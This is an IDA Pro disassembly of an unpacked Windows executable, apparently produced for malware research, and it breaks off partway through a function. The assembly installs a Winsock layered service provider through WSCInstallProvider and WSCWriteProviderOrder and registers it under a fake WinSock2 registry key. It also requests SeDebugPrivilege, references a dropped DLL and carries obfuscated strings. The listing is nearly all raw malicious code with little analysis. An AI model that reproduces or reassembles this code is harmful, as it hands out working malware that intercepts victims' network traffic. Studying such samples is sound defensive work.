;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BD21209BFDEC0BF09533CEF4120E4C6A
; File Name : u:\work\bd21209bfdec0bf09533cef4120e4c6a_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_0 segment para public 'CODE' use32
assume cs:_0
;org 401000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_401000 dd 77DD5D20h, 77DF7311h, 77DDA595h, 77DD23D7h ; DATA XREF: sub_401FD0+11�r
; sub_401FD0+2B�r ...
dword_401010 dd 77DD590Bh ; DATA XREF: sub_401630+8E�r
; sub_4017D0+76�r
dword_401014 dd 77DD22EAh, 77DD189Ah, 0 ; DATA XREF: sub_4017D0+29�r
; sub_402240-6EB�r ...
off_401020 dd offset sub_41E15D ; DATA XREF: sub_4014A0+14�r
off_401024 dd offset sub_41E33E ; DATA XREF: sub_4014A0+29�r
dword_401028 dd 77E77CCEh ; DATA XREF: sub_4014F0+FE�r
; sub_401630+159�r
dword_40102C dd 77E79C90h ; DATA XREF: sub_401FD0+A�r
dword_401030 dd 77E61BE6h ; DATA XREF: sub_4022F0+2A6�r
dword_401034 dd 77E6177Ah ; DATA XREF: _0:00402952�r
dword_401038 dd 77E74672h ; DATA XREF: sub_4014F0+D9�r
; sub_401630+133�r
dword_40103C dd 77E6AD34h, 41DF18h ; DATA XREF: sub_402240-68D�r
; sub_402240-725�r ...
off_401044 dd offset sub_41E254 ; DATA XREF: sub_402240-72C�r
; sub_401D20+A8�r ...
dword_401048 dd 77E704FCh, 77E705B0h, 77E760B5h, 77E7105Fh, 77E6CA8Ah
; DATA XREF: sub_402240-74F�r
; sub_401D20+75�r ...
dd 77F5157Dh, 0
dword_401064 dd 73E3A217h, 73DD51E8h, 73DD9C2Bh, 73DE14F8h, 73DDB5A5h
; DATA XREF: sub_4026EC�r sub_4026F2�r ...
dd 73DE0CCAh, 73DE06C6h, 73DE0245h, 73DD13B3h, 73DD48DEh
dd 73E2EBC3h, 73DE747Fh, 73DD11D4h, 73DD2583h, 73DD1194h
dd 73DD13D0h, 73DD9144h, 2 dup(73DD7129h), 73E2EB8Ch, 73DD1A47h
dd 73E2E633h, 73DE6A75h, 73E2E66Bh, 73E2E62Dh, 73E2E671h
dd 73E2E610h, 2 dup(73DD17E0h), 73DD7129h, 73DE3F13h, 73E2E639h
dd 73DD223Ch, 73E487C6h, 73DDAFAFh, 73DD3876h, 73DE75A1h
dd 73E2BDF8h, 73E77FD8h
dword_401100 dd 73DDB4ACh ; DATA XREF: sub_402A44�r
dword_401104 dd 73DD1083h, 73DD7331h, 73DE0352h, 73DE068Fh, 73DD6C18h
; DATA XREF: sub_4026E0�r sub_4026DA�r ...
dd 73DE6CDDh, 73E28E89h, 73DD3941h, 73E68253h, 73DD3EB0h
dd 73DD198Eh, 73E2BDE5h, 73DEA37Eh, 73DD403Bh, 73DD191Ch
dd 73DD38C4h, 73DD7129h, 73E3A49Dh, 0
dword_401150 dd 77C4A658h ; DATA XREF: sub_4029DA�r
dword_401154 dd 77C33EB0h ; DATA XREF: sub_4029D4�r
dword_401158 dd 77C33632h ; DATA XREF: _0:0040287B�r
dword_40115C dd 77C1EB68h ; DATA XREF: _0:00402890�r
dword_401160 dd 77C1EB4Ah ; DATA XREF: _0:0040289E�r
dword_401164 dd 77C5D388h ; DATA XREF: _0:004028AC�r
dword_401168 dd 77C48F60h ; DATA XREF: _0:004028CA�r
dword_40116C dd 77C379DBh ; DATA XREF: sub_4029B8�r
dword_401170 dd 77C1E909h ; DATA XREF: _0:00402903�r
dword_401174 dd 77C5C7A8h ; DATA XREF: _0:0040291B�r
dword_401178 dd 77C37ADCh ; DATA XREF: _0:00402986�r
dword_40117C dd 77C31269h ; DATA XREF: sub_4029B2�r
dword_401180 dd 77C37AEEh, 77C2EFFDh ; DATA XREF: _0:004029A6�r
; sub_402A04+1C�r
dword_401188 dd 77C43CB2h ; DATA XREF: sub_4014F0+C5�r
; sub_401630+EE�r
dword_40118C dd 77C43C88h ; DATA XREF: sub_401630+FF�r
; ---------------------------------------------------------------------------
loc_401190: ; DATA XREF: sub_402810+D�r
div byte ptr [eax]
retn
; ---------------------------------------------------------------------------
ja short near ptr byte_4011D5 ; DATA XREF: sub_4029AC�r
xor ebx, eax
ja short loc_40119F ; DATA XREF: sub_401FA0+A�r
mov edi, 0D8F677C3h ; DATA XREF: sub_401FA0+1B�r
retn
; ---------------------------------------------------------------------------
loc_40119F: ; CODE XREF: _0:00401197�j
; DATA XREF: sub_401F80+2�r
ja short near ptr byte_4011ED
push 0FFFFFFC4h
ja short near ptr dword_401104+21h ; DATA XREF: sub_401F80+9�r
push edx
retn
; ---------------------------------------------------------------------------
db 77h
; ---------------------------------------------------------------------------
loc_4011A8: ; DATA XREF: sub_402800�r
fcomp dword ptr [edx]
retn 4677h ; DATA XREF: sub_4017D0+A6�r
; sub_4017D0+171�r
; ---------------------------------------------------------------------------
lodsb
retn 6B77h ; DATA XREF: sub_4017D0+149�r
; sub_4017D0+21C�r
; ---------------------------------------------------------------------------
stosb
retn 77h
; ---------------------------------------------------------------------------
align 4
dword_4011B8 dd 77CDC9B5h ; DATA XREF: sub_401630+98�r
dword_4011BC dd 77CD8989h ; DATA XREF: sub_401630+67�r
dword_4011C0 dd 77CC7CB6h ; DATA XREF: sub_401630+51�r
align 8
dword_4011C8 dd 71AB6738h ; DATA XREF: sub_4029E6�r
dword_4011CC dd 71ABFE48h ; DATA XREF: sub_4029E0�r
dd 0
byte_4011D4 db 0 ; DATA XREF: _0:0040290E�o
byte_4011D5 db 3 dup(0) ; CODE XREF: _0:00401193�j
dd offset loc_402A2D
dd offset loc_402130
dd offset loc_402170
dd offset loc_402230
dword_4011E8 dd 0 ; DATA XREF: _0:00402909�o
byte_4011EC db 0 ; DATA XREF: _0:004028DB�o
byte_4011ED db 3 dup(0) ; CODE XREF: _0:loc_40119F�j
dword_4011F0 dd 4 dup(0) ; DATA XREF: _0:004028D6�o
aWscwriteprovid db 'WSCWriteProviderOrder',0 ; DATA XREF: sub_4014A0+23�o
align 4
aSporder_dll db 'sporder.dll',0 ; DATA XREF: sub_4014A0:loc_4014AF�o
; sub_4022F0+1B3�o
aSoftwareWinsoc db 'SOFTWARE\WinSock2\Buibert',0 ; DATA XREF: sub_4017D0+1F�o
; sub_4017D0+6C�o
align 10h
off_401240 dd offset loc_41004C ; DATA XREF: sub_4014F0+12�o
aYered_provider:
unicode 0, <YERED_PROVIDER>,0
align 4
off_401264 dd offset loc_41004C ; DATA XREF: sub_401630+9�r
dword_401268 dd 450059h ; DATA XREF: sub_401630+23�r
dword_40126C dd 450052h ; DATA XREF: sub_401630+E�r
dword_401270 dd 200044h ; DATA XREF: sub_401630+1E�r
word_401274 dw 0 ; DATA XREF: sub_401630+33�r
align 4
aInternetExplor db '\internet explorer',0 ; DATA XREF: sub_402240-655�o
align 4
aProgramfilesdi db 'ProgramFilesDir',0 ; DATA XREF: sub_402240-6C8�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion',0
; DATA XREF: sub_402240-6F9�o
align 4
asc_4012C8: ; DATA XREF: sub_402640+9�o
unicode 0, <\>,0
aR: ; DATA XREF: sub_401FA0+4�o
unicode 0, <r>,0
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_401FD0+24�o
align 4
aDll db 'DLL',0 ; DATA XREF: sub_4022F0+222�o
; sub_4022F0+270�o
aRsvp32_2_dll db 'rsvp32_2.dll',0 ; DATA XREF: sub_4022F0+1E5�o
; sub_4022F0:loc_40259C�o
align 4
aPersonnel db 'personnel ',0 ; DATA XREF: sub_4022F0+12A�o
align 4
aGobmccpsmrmggc db ' gobmccpsmrmggcomcenldrg',0 ; DATA XREF: sub_4022F0+11C�o
align 10h
aLaboratory db 'Laboratory ',0 ; DATA XREF: sub_4022F0+D4�o
aNrlqomhqibqjsq db ' nrlqomhqibqjsqderqpkghlrk',0 ; DATA XREF: sub_4022F0+C6�o
align 4
a1992 db '1992 ',0 ; DATA XREF: sub_4022F0+7E�o
align 10h
aHsebnfmsqijorf db ' hsebnfmsqijorfjooonckehpdp',0 ; DATA XREF: sub_4022F0+70�o
aEndedIn db 'ended in ',0 ; DATA XREF: sub_4022F0+2A�o
align 4
aNjosphlbmombii db ' njosphlbmombiifgomrkdmdfgr',0 ; DATA XREF: sub_4022F0+1A�o
align 10h
dword_4013A0 dd 1 ; DATA XREF: _0:004028BD�r
align 8
off_4013A8 dd offset loc_4020A0 ; DATA XREF: sub_4020B0�o
dd offset dword_4013B0
dword_4013B0 dd 111h, 0 ; DATA XREF: _0:004013AC�o
dd 2 dup(0E146h), 0Ch, 402680h, 6 dup(0)
off_4013E0 dd offset loc_4027B2 ; DATA XREF: sub_402140-76�o
dd offset loc_402100
dd offset nullsub_3
dd offset nullsub_4
dd offset nullsub_3
dd offset sub_4027AC
dd offset sub_4027A6
dd offset sub_4027A0
dd offset sub_40279A
dd offset sub_402794
dd offset sub_40278E
dd offset sub_402788
dd offset sub_4020B0
dd offset sub_402782
dd offset sub_40277C
dd offset sub_402776
dd offset sub_402770
dd offset sub_40276A
dd offset sub_402764
dd offset sub_40275E
dd offset sub_402758
dd offset sub_402752
dd offset sub_4022F0
dd offset sub_40274C
dd offset sub_402746
dd offset sub_402740
dd offset sub_40273A
dd offset sub_402734
dd offset sub_40272E
dd offset sub_402728
dd offset sub_402722
dd offset sub_40271C
dd offset sub_402716
dd offset sub_402710
dd offset sub_40270A
dd offset sub_402704
dd offset sub_4026FE
dd offset sub_4026F8
dd offset sub_4026F2
dd offset sub_4026EC
dd offset sub_4026E6
align 8
dword_401488 dd 0FFFFFFFFh, 40298Ch, 4029A0h, 3 dup(0) ; DATA XREF: _0:00402853�o
; =============== S U B R O U T I N E =======================================
sub_4014A0 proc near ; CODE XREF: sub_4017D0+F�p
mov eax, dword_403000
test eax, eax
jz short loc_4014AF
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_4014AF: ; CODE XREF: sub_4014A0+7�j
push offset aSporder_dll ; "sporder.dll"
call off_401020
test eax, eax
mov dword_403000, eax
jz short loc_4014DE
push offset aWscwriteprovid ; "WSCWriteProviderOrder"
push eax
call off_401024
xor ecx, ecx
mov dword_402FE0, eax
test eax, eax
setnz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4014DE: ; CODE XREF: sub_4014A0+21�j
xor eax, eax
retn
sub_4014A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014F0 proc near ; CODE XREF: sub_4017D0+83�p
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 280h
push ebx
push esi
push edi
mov edi, ecx
mov eax, edi
xor esi, esi
push offset off_401240
mov [ebp+var_4], edi
mov ecx, [eax]
mov [ebp+var_280], esi
mov [ebp+var_26C], ecx
mov [ebp+var_27C], esi
mov edx, [eax+4]
mov [ebp+var_278], esi
mov [ebp+var_268], edx
mov [ebp+var_274], esi
mov ecx, [eax+8]
mov [ebp+var_270], 4
mov [ebp+var_264], ecx
mov [ebp+var_25C], esi
mov edx, [eax+0Ch]
mov eax, 10h
mov [ebp+var_230], eax
mov [ebp+var_22C], eax
lea eax, [ebp+var_20C]
mov [ebp+var_260], edx
push eax
mov [ebp+var_258], esi
mov [ebp+var_238], esi
mov [ebp+var_234], 2
mov [ebp+var_228], 1
mov [ebp+var_224], 6
mov [ebp+var_220], esi
mov [ebp+var_21C], esi
mov [ebp+var_218], esi
mov [ebp+var_214], esi
mov [ebp+var_210], esi
call dword_401188 ; wcscpy
mov eax, [edi+10h]
add esp, 8
cmp eax, esi
mov [ebp+var_8], eax
jz short loc_4015F9
push eax
call dword_401038 ; lstrlen
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_4027D0
mov ecx, [ebp+var_8]
mov ebx, esp
push edi
push ebx
push 0FFFFFFFFh
push ecx
push esi
push esi
mov [ebx], si
call dword_401028 ; MultiByteToWideChar
mov edi, [ebp+var_4]
mov esi, ebx
loc_4015F9: ; CODE XREF: sub_4014F0+D6�j
lea edx, [ebp+var_C]
lea eax, [ebp+var_280]
push edx
push 1
push eax
push esi
push edi
call sub_4029E0 ; WSCInstallProvider
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_25C]
lea esp, [ebp-28Ch]
mov [ecx], edx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4014F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401630 proc near ; CODE XREF: sub_4017D0+13A�p
var_2A8 = dword ptr -2A8h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_234 = byte ptr -234h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2A8h
mov eax, off_401264
mov edx, dword_40126C
push ebx
mov ebx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov [ebp+var_28], eax
mov eax, dword_401270
mov ecx, dword_401268
mov [ebp+var_1C], eax
mov eax, [ebx+28h]
push esi
mov [ebp+var_24], ecx
mov cx, word_401274
xor esi, esi
cmp eax, 1
push edi
mov [ebp+var_20], edx
mov [ebp+var_18], cx
jnz loc_4017B5
lea edx, [ebp+var_14]
push edx
call dword_4011C0
test eax, eax
jnz loc_4017B5
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_14]
push eax
push ecx
call dword_4011BC
test eax, eax
jnz loc_4017B5
mov ecx, [ebp+arg_0]
lea edx, [ebp+var_30]
lea eax, [ebp+var_34]
push edx
mov edx, [ebp+arg_8]
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push ecx
push edx
call dword_401010 ; RegCreateKeyExA
lea eax, [ebp+arg_0]
push eax
call dword_4011B8
mov edx, [ebp+var_10]
mov eax, [ebp+var_C]
mov ecx, 9Dh
mov esi, ebx
lea edi, [ebp+var_2A8]
rep movsd
mov ecx, [ebp+var_14]
mov edi, [ebp+var_2A8]
mov [ebp+var_290], edx
mov [ebp+var_28C], eax
lea edx, [ebp+var_28]
mov [ebp+var_294], ecx
mov ecx, [ebp+var_8]
lea eax, [ebp+var_234]
and edi, 0FFFDFFFFh
push edx
push eax
mov [ebp+var_2A8], edi
mov [ebp+var_288], ecx
call dword_401188 ; wcscpy
lea ecx, [ebx+74h]
lea edx, [ebp+var_234]
push ecx
push edx
call dword_40118C ; wcscat
mov edx, [ebp+var_4]
mov ecx, [ebx+24h]
mov eax, [ebp+arg_4]
add esp, 10h
mov ebx, [edx+10h]
mov [ebp+var_280], 2
test ebx, ebx
mov [ebp+var_27C], eax
mov [ebp+var_278], ecx
jnz short loc_401762
xor edi, edi
jmp short loc_40178F
; ---------------------------------------------------------------------------
loc_401762: ; CODE XREF: sub_401630+12C�j
push ebx
call dword_401038 ; lstrlen
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4027D0
mov edi, esp
push esi
push edi
push 0FFFFFFFFh
push ebx
push 0
push 0
mov word ptr [edi], 0
call dword_401028 ; MultiByteToWideChar
loc_40178F: ; CODE XREF: sub_401630+130�j
lea eax, [ebp+var_2C]
lea ecx, [ebp+var_2A8]
push eax
push 1
push ecx
lea edx, [ebp+var_14]
push edi
push edx
call sub_4029E0 ; WSCInstallProvider
lea esp, [ebp-2B4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_4017B5: ; CODE XREF: sub_401630+47�j
; sub_401630+59�j ...
lea esp, [ebp-2B4h]
mov eax, esi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_401630 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4017D0 proc near ; CODE XREF: sub_4022F0+30A�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
sub esp, 18h
push ebx
push ebp
push esi
push edi
xor edi, edi
mov ebx, ecx
mov [esp+28h+var_18], edi
call sub_4014A0
lea eax, [esp+28h+var_C]
push eax
push 0F003Fh
push edi
push offset aSoftwareWinsoc ; "SOFTWARE\\WinSock2\\Buibert"
push 80000002h
call dword_401014 ; RegOpenKeyExA
mov edx, [esp+28h+arg_0]
mov eax, [esp+28h+arg_4]
mov ecx, ebx
mov [ecx], edx
mov edx, [esp+28h+arg_8]
mov [ecx+4], eax
mov eax, [esp+28h+arg_C]
mov [ecx+8], edx
mov [ecx+0Ch], eax
mov ecx, [esp+28h+arg_10]
push ecx
lea ecx, [ebx+10h]
call sub_402686
lea edx, [esp+28h+var_4]
lea eax, [esp+28h+var_C]
push edx
push eax
push edi
push 0F003Fh
push edi
push edi
push edi
push offset aSoftwareWinsoc ; "SOFTWARE\\WinSock2\\Buibert"
push 80000002h
call dword_401010 ; RegCreateKeyExA
lea ecx, [esp+28h+var_14]
push ecx
mov ecx, ebx
call sub_4014F0
test eax, eax
jnz loc_4019FF
lea edx, [esp+28h+var_10]
lea eax, [esp+28h+var_18]
push edx
push eax
push edi
push edi
call sub_4029E6 ; WSCEnumProtocols
mov ecx, [esp+28h+var_18]
push ecx
call dword ptr locret_4011AA+2
mov esi, eax
add esp, 4
cmp esi, edi
mov [esp+28h+arg_10], esi
jz loc_4019FF
lea edx, [esp+28h+var_10]
lea eax, [esp+28h+var_18]
push edx
push eax
push esi
push edi
call sub_4029E6 ; WSCEnumProtocols
cmp eax, 0FFFFFFFFh
jz loc_4019FF
cmp eax, edi
mov [esp+28h+var_8], edi
jle loc_4019FF
lea edx, [esi+24h]
mov [esp+28h+arg_0], eax
loc_4018BA: ; CODE XREF: sub_4017D0+117�j
mov ecx, 4
mov edi, ebx
lea esi, [edx-10h]
xor ebp, ebp
repe cmpsd
jnz short loc_4018D8
mov ecx, [edx]
mov [esp+28h+var_8], 1
mov [esp+28h+var_14], ecx
loc_4018D8: ; CODE XREF: sub_4017D0+F8�j
mov ecx, [esp+28h+arg_0]
add edx, 274h
dec ecx
mov [esp+28h+arg_0], ecx
jnz short loc_4018BA
mov ecx, [esp+28h+var_8]
test ecx, ecx
jz loc_4019FF
mov ebp, [esp+28h+arg_10]
mov edi, eax
mov esi, ebp
loc_4018FD: ; CODE XREF: sub_4017D0+146�j
mov edx, [esp+28h+var_C]
mov eax, [esp+28h+var_14]
push edx
push eax
push esi
mov ecx, ebx
call sub_401630
add esi, 274h
dec edi
jnz short loc_4018FD
push ebp
call dword ptr locret_4011AE+2
add esp, 4
lea ecx, [esp+28h+var_10]
lea edx, [esp+28h+var_18]
mov [esp+28h+var_18], 0
push ecx
push edx
push 0
push 0
call sub_4029E6 ; WSCEnumProtocols
mov eax, [esp+28h+var_18]
mov edi, dword ptr locret_4011AA+2
push eax
call edi
mov ebp, eax
add esp, 4
test ebp, ebp
mov [esp+28h+arg_10], ebp
jz loc_4019FF
lea ecx, [esp+28h+var_10]
lea edx, [esp+28h+var_18]
push ecx
push edx
push ebp
push 0
call sub_4029E6 ; WSCEnumProtocols
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_4019FF
lea eax, ds:0[esi*4]
push eax
call edi
mov ebx, eax
add esp, 4
test ebx, ebx
jz short loc_4019FF
xor edx, edx
test esi, esi
jle short loc_4019E4
mov ecx, ebx
lea eax, [ebp+2Ch]
mov edi, esi
loc_401998: ; CODE XREF: sub_4017D0+1E9�j
cmp dword ptr [eax-4], 1
jle short loc_4019B3
mov ebp, [esp+28h+var_14]
cmp [eax], ebp
jnz short loc_4019AF
mov ebp, [eax-8]
inc edx
mov [ecx], ebp
add ecx, 4
loc_4019AF: ; CODE XREF: sub_4017D0+1D4�j
mov ebp, [esp+28h+arg_10]
loc_4019B3: ; CODE XREF: sub_4017D0+1CC�j
add eax, 274h
dec edi
jnz short loc_401998
test esi, esi
jle short loc_4019E4
lea ecx, [ebx+edx*4]
lea eax, [ebp+2Ch]
loc_4019C5: ; CODE XREF: sub_4017D0+212�j
cmp dword ptr [eax-4], 1
jle short loc_4019D3
mov edi, [esp+28h+var_14]
cmp [eax], edi
jz short loc_4019DC
loc_4019D3: ; CODE XREF: sub_4017D0+1F9�j
mov edi, [eax-8]
inc edx
mov [ecx], edi
add ecx, 4
loc_4019DC: ; CODE XREF: sub_4017D0+201�j
add eax, 274h
dec esi
jnz short loc_4019C5
loc_4019E4: ; CODE XREF: sub_4017D0+1BF�j
; sub_4017D0+1ED�j
push edx
push ebx
call dword_402FE0
mov esi, dword ptr locret_4011AE+2
push ebp
mov [esp+2Ch+var_10], eax
call esi
push ebx
call esi
add esp, 8
loc_4019FF: ; CODE XREF: sub_4017D0+8A�j
; sub_4017D0+B7�j ...
mov ecx, [esp+28h+var_C]
push ecx
call dword_401014+4
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 18h
retn 14h
sub_4017D0 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402240
loc_401A20: ; CODE XREF: sub_402240+5�j
push 0FFFFFFFFh
push offset loc_402AB7
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 114h
push ebx
push ebp
push esi
mov esi, ecx
push edi
mov [esp+130h+var_114], esi
call sub_4026A4
lea ecx, [esi+4]
mov [esp+0F8h+arg_30], 0
call sub_4026A4
lea ebx, [esi+8]
mov byte ptr [esp+0F8h+arg_30], 1
mov ecx, ebx
call sub_4026A4
lea ebp, [esi+0Ch]
mov byte ptr [esp+0F8h+arg_30], 2
mov ecx, ebp
call sub_4026A4
lea ecx, [esi+10h]
mov byte ptr [esp+0F8h+arg_30], 3
call sub_4026A4
lea ecx, [esi+14h]
mov byte ptr [esp+0F8h+arg_30], 4
call sub_4026A4
mov ecx, 40h
xor eax, eax
lea edi, [esp+0F8h+var_D7]
mov [esp+0F8h+var_D8], 0
rep stosd
stosw
stosb
lea eax, [esp+0F8h+var_D8]
push 104h
push eax
mov byte ptr [esp+100h+arg_30], 5
mov [esp+100h+var_E0], 104h
call dword_401048+4
lea ecx, [esp+0F8h+var_D8]
mov [esp+eax+0F8h+var_D8], 0
push ecx
mov ecx, esi
call sub_402686
lea edx, [esp+0F8h+var_D8]
push 104h
push edx
call dword_401048 ; GetSystemDirectoryA
mov [esp+eax+0F8h+var_D8], 0
lea eax, [esp+0F8h+var_D8]
push eax
mov ecx, ebx
call sub_402686
lea ecx, [esp+0F8h+var_D8]
push 104h
push ecx
push 0
call off_401044
push eax
call dword_40103C+4
lea edx, [esp+0F8h+var_D8]
lea ecx, [esi+10h]
push edx
call sub_402686
xor edi, edi
mov [esp+0F8h+var_E4], edi
lea eax, [esp+0F8h+var_E8]
mov byte ptr [esp+0F8h+arg_30], 6
push eax
push 20019h
push edi
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov [esp+10Ch+var_E8], edi
call dword_401014 ; RegOpenKeyExA
test eax, eax
jnz short loc_401B67
mov edi, [esp+0F8h+var_E8]
mov [esp+0F8h+var_E4], edi
loc_401B67: ; CODE XREF: sub_402240-6E3�j
lea ecx, [esp+0F8h+var_E0]
lea edx, [esp+0F8h+var_D8]
push ecx
lea eax, [esp+0FCh+var_E8]
push edx
push eax
push 0
push offset aProgramfilesdi ; "ProgramFilesDir"
push edi
mov [esp+110h+var_E8], 0
call dword_401000+0Ch
test edi, edi
jz short loc_401B9D
push edi
call dword_401014+4
xor edi, edi
mov [esp+110h+var_FC], edi
loc_401B9D: ; CODE XREF: sub_402240-6B2�j
lea ecx, [esp+110h+var_F0]
push ecx
mov ecx, ebp
call sub_402686
lea edx, [esp+114h+var_F4]
push edx
push 104h
call dword_40103C ; GetTempPathA
lea eax, [esp+11Ch+var_FC]
lea ecx, [esi+14h]
push eax
call sub_402686
lea ecx, [esi+14h]
call sub_40269E
mov ecx, ebx
call sub_40269E
mov ecx, esi
call sub_40269E
mov ecx, ebp
call sub_40269E
lea ecx, [esi+10h]
call sub_40269E
push offset aInternetExplor ; "\\internet explorer"
lea ecx, [esp+124h+var_110]
push ebp
push ecx
call sub_402698
push eax
lea ecx, [esi+4]
mov byte ptr [esp+130h], 7
call sub_402692
lea ecx, [esp+130h+var_120]
mov byte ptr [esp+130h+var_4], 6
call sub_40268C
test edi, edi
jz short loc_401C28
push edi
call dword_401014+4
loc_401C28: ; CODE XREF: sub_402240-621�j
mov ecx, [esp+130h+var_C]
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
mov large fs:0, ecx
add esp, 120h
retn
; END OF FUNCTION CHUNK FOR sub_402240
; ---------------------------------------------------------------------------
align 10h
loc_401C50: ; CODE XREF: _0:00402AA7�j
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_401C66
push eax
call dword_401014+4
mov dword ptr [esi], 0
loc_401C66: ; CODE XREF: _0:00401C57�j
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C70 proc near ; CODE XREF: sub_402180+7�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
push 0FFFFFFFFh
push offset SEH_401C70
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ebx
push esi
mov esi, ecx
mov [esp+18h+var_10], esi
call sub_4026BC
xor ebx, ebx
lea ecx, [esi+14h]
mov [esp+18h+var_4], ebx
call sub_4026A4
lea ecx, [esi+18h]
mov byte ptr [esp+18h+var_4], 1
call sub_4026A4
lea ecx, [esi+1Ch]
mov byte ptr [esp+18h+var_4], 2
call sub_4026A4
lea ecx, [esi+20h]
mov byte ptr [esp+18h+var_4], 3
call sub_4026A4
mov eax, [esp+18h+arg_0]
mov byte ptr [esp+18h+var_4], 4
cmp eax, ebx
mov [esi+2Bh], bl
mov [esi+2Ah], bl
mov [esi+29h], bl
mov [esi+28h], bl
mov [esi+2Ch], ebx
jz short loc_401D02
push ecx
mov ecx, esp
mov [esp+1Ch+arg_0], esp
push offset dword_403008
call sub_4026B6
push 1
push 1
push 1
mov ecx, esi
call sub_401D20
loc_401D02: ; CODE XREF: sub_401C70+72�j
mov ecx, [esp+18h+var_C]
mov eax, esi
pop esi
mov large fs:0, ecx
pop ebx
add esp, 10h
retn 4
sub_401C70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D20 proc near ; CODE XREF: sub_401C70+8D�p
; sub_4022F0+19F�p
var_17C = byte ptr -17Ch
var_174 = byte ptr -174h
var_173 = byte ptr -173h
var_110 = byte ptr -110h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = byte ptr 10h
push 0FFFFFFFFh
push offset SEH_401D20
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 16Ch
push ebx
push ebp
push esi
push edi
mov esi, ecx
mov eax, [esp+188h+arg_8]
xor ebx, ebx
cmp eax, ebx
mov [esp+188h+var_4], ebx
jz short loc_401D5A
call sub_401F80
loc_401D5A: ; CODE XREF: sub_401D20+33�j
mov ecx, 18h
xor eax, eax
lea edi, [esp+188h+var_173]
mov [esp+188h+var_174], bl
rep stosd
stosw
stosb
